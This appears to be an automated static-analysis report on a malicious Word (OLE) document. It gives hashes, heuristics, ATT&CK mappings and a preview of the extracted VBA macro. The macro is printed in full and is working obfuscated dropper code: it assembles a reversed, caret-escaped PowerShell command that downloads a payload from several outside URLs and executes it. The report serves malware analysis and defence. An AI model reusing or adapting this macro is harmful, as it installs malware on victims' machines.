Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 207cd5d26315337d…

MALICIOUS

Office (OLE)

73.9 KB Created: 2018-09-12 00:25:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: d85200ac81978b2ddd72a62a82000ed0 SHA-1: d3620872ff7b2aa9a1e833b0de5f791937b3c9d5 SHA-256: 207cd5d26315337dbc72a6cb7213760d8ae0563e63f0ba4b6c07f537fab87ea6
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document containing VBA macros. The macros are heavily obfuscated but appear to construct and execute a command-line string. This command likely downloads and executes a second-stage payload, indicated by the use of 'download' and 'execute' in the reconstructed command. The OLE slack space anomaly also suggests potential obfuscation or padding within the file structure.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 75,648 bytes but its declared streams total only 36,671 bytes — 38,977 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4875 bytes
SHA-256: 90ed7057cafd630fde4997d068ea88e6eed83b418a2dd667e7b56a2ebd0a2d81
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "huwGkBsrEXwa"
Function azqEFNOHO()

On _
Error _
Resume _
Next
VarType "iIcudkjzsWjS" + "tY"
   VarType "JS" + "215112845"
   VarType "151846085" + "2066"
   VarType "zPfKo" + "52642209"
wqLkCG = Format(Chr(6 + 5 + 10 + 1 + 77)) + "md /V" + "/" + Format(Chr(4 + 3 + 7 + 0 + 53)) + Format(Chr(2 + 1 + 3 + 0 + 28)) + "^s^" + "et ^" + "Z^eqH"
VarType "115539891" + "sWChbsGsSR"
   VarType "Qu" + "wRFQ" + "4327" + "3649"
SvczZoXnI = "=  ^  " + "   " + " ^ ^ ^" + "   " + "^    " + "^" + "}^}{h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "t^a" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "}^;" + "kaer" + "b" + "^;^m" + "N^l$^" + " me"
VarType "HP" + "hO"
   VarType "RI" + "vNzURQiwZaWpBh" + "9485" + "nkRPbYGpZO"
   VarType "mU" + "mEujjiJ" + "5140" + "BBtVq"
KGtjiTBImIP = "tI^-e^k" + "^ovn" + "I;)mNl$" + "^ ," + "XX^" + "l$(^eli" + "F^d^a^" + "o^ln" + "woD^." + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^"
VarType "nnRvRAEdM" + "321248922" + "132547621" + "57585535"
   VarType "j" + "8410" + "234824351" + "oY"
   VarType "182405393" + "pw" + "7551" + "250379215"
cldvYznrivc = "B^M$^{y" + "rt{" + ")" + Format(Chr(4 + 3 + 7 + 0 + 53)) + "o" + "^j$^ n" + "i^ " + "X^X^l^" + "$" + "("
VarType "ECrD" + "5147" + "DMwXclBXo" + "VYETzdBlXOpPhF"
   VarType "6514" + "G" + "wCNLrGm" + "521965617"
   VarType "DPU" + "GM"
kahbWRok = "^h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "aero^" + "f^;" + "^'ex^" + "e^.^'+^" + "X^h^z"
VarType "TKMQSEQcI" + "r" + "3657" + "375034381"
   VarType "DRT" + "roisOdtH"
   VarType "687" + "uEJiLLnAuNYd" + "XaNOpS" + "T"
nulzKfAO = "^$^+'\" + "^'" + "^+" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "i^l^" + "b^u^p:" + "v" + "n^e^" + "$"
VarType "QUK" + "8843"
   VarType "FNrW" + "175601914"
   VarType "QqwX" + "9975" + "1900" + "4904"
JMAVGSbzEW = "=mN^l$^" + ";'" + "^024" + "'^ =^" + " ^" + "Xh^z" + "^$;)^'" + "^@^'(^" + "ti^l^p"
VarType "aGSq" + "GnvS"
   VarType "mLcXjW" + "2247"
   VarType "Hh" + "7114" + "fGlAORaJQ" + "9283"
LboFQJrT = "S" + ".^'TT1" + "q^2/" + "^lp" + "." + "ta^iw" + "^k" + "^-or^" + "u" + "e//"
VarType "293900752" + "1323"
   VarType "GTYkk" + "X"
DCtUQbtLO = ":" + "p^t^t^h" + "@" + "mVZ" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "R/^" + "t^" + "en.^s" + "r^" + "ot" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "a" + "r"
VarType "ruMkX" + "ud" + "275244492" + "jWD"
   VarType "w" + "9095"
   VarType "201722938" + "nUwSqvBr" + "1282" + "BhiEj"
   VarType "8242" + "WT"
   VarType "b" + "SZFrmTE" + "MHoNPRu" + "VIB"
aALVIVA = "^tn" + "^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^-eg^" + "atireh/" + "/:^p" + "^t^" + "t^h" + "@l^B^y^" + "A/^" + "m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "." + "om^hs" + "^a^ml" + "a^p"
VarType "ic" + "CU" + "aVjH" + "wE"
   VarType "w" + "GRVL" + "514313996" + "WwPMrRc"
OmiquzS = "s^alle" + "t^o^h/" + "/:^" + "pt^th^@" + "E/^"
VarType "7801" + "moRi" + "lb" + "uXA"
   VarType "wPfiYk" + "239530499"
   VarType "335836338" + "Dh" + "RaZAzBWi" + "uRtqU"
   VarType "6677" + "280806553"
oPSDYHhcc = "mo" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".ss^e" + Format(Chr(6 + 5 + 10 + 1 + 77)) + Format(Chr(6 + 5 + 10 + 1 + 77)) + "u^s" + "^g" + "n^ill^" + "es^dl" + "^o^g//" + ":^p"
azqEFNOHO = wqLkCG + SvczZoXnI + KGtjiTBImIP + cldvYznrivc + kahbWRok + nulzKfAO + JMAVGSbzEW + LboFQJrT + DCtUQbtLO + aALVIVA + OmiquzS + oPSDYHhcc
   VarType "1237" + "vFlqfIkrl" + "AYCRj" + "LNJjnUfTDzSU"
   VarType "192742861" + "250622389"
   VarType "148" + "F"
End Function
Function NYuGNFE()

On _
Error _
Resume _
Next
VarType "fh" + "YJbp"
   VarType "HdCvwWrOHMA" + "Z" + "OcXBFhkaq" + "TD"
   VarType "8170" + "TO"
   VarType "7652" + "451040733" + "M" + "cfz"
   VarType "vjKaZSmjpQXUk" + "579" + "445337301" + "MVoB"
VdkoHlZj = "t" + "^th@3^" + "EU" + "^Z" + "^" + "Wu/^m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".s^b^a" + "l^-l3" + "//:" + "^p^t" + "^th"
VarType "zmvIEjm" + "504124773" + "132529308" + "215997801"
   VarType "tzHkl" + "hjXMwwJXBHLCO"
   VarType "WRSYCmSj" + "iDaY" + "cPSul" + "282961178"
jjjLiHwBnXY = "^'=" + For
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.